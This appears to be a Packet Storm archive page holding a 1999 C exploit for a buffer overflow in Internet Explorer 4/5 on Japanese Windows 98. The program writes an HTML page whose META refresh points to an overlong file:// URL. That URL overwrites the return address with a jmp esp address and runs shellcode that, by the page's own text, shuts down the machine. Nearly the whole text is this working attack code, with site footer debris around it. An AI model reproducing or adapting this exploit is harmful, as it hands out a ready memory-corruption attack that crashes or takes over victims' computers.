This is overflow exploit for IE5.
af06e379b7a306fde53304718b7a6241229b6901fa31f4561c882f3b0b99c9d2/*=========================================================================
Microsoft IE4/5 for Windows98 exploit
The Shadow Penguin Security (http://shadowpenguin.backsection.net)
Written by UNYUN (shadowpenguin@backsection.net)
=========================================================================
*/
#include <stdio.h>
#include <windows.h>
#define MAXBUF 1000
#define RETADR 53
/*
jmp esp (FF E4) code is stored in this area.
You must change this address for non-Japanese Windows98
*/
#define EIP 0xbfb75a35
unsigned char exploit_code[200]={
0x43,0x43,0x43,0x43,0x43,0x53,0x53,0x53,
0xB8,0x2D,0x23,0xF5,0xBF,0x48,0x50,0xC3,
0x00
};
main(int argc,char *argv[])
{
FILE *fp;
unsigned int ip;
unsigned char buf[MAXBUF];
if (argc<2){
printf("usage %s output_htmlfile\n",argv[0]);
exit(1);
}
if ((fp=fopen(argv[1],"wb"))==NULL) return FALSE;
fprintf(fp,"<META HTTP-EQUIV=\"Refresh\" CONTENT=\"0;URL=file://test/");
memset(buf,0x41,MAXBUF);
ip=EIP;
buf[RETADR-1]=0x7f;
buf[RETADR ]=ip&0xff;
buf[RETADR+1]=(ip>>8)&0xff;
buf[RETADR+2]=(ip>>16)&0xff;
buf[RETADR+3]=(ip>>24)&0xff;
memcpy(buf+80,exploit_code,strlen(exploit_code));
buf[MAXBUF]=0;
fprintf(fp,"%s/\">\n<HTML>If you are using IE5 for Japanese Windows98, ",buf);
fprintf(fp,"maybe, the exploit code which shuts down your machine will be executed.<BR><BR>");
fprintf(fp,"By Shadow Penguin Security (http://shadowpenguin.backsection.net/), Nov.6,1999</HTML>\n");
fclose(fp);
printf("%s created.\n",argv[1]);
return FALSE;
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed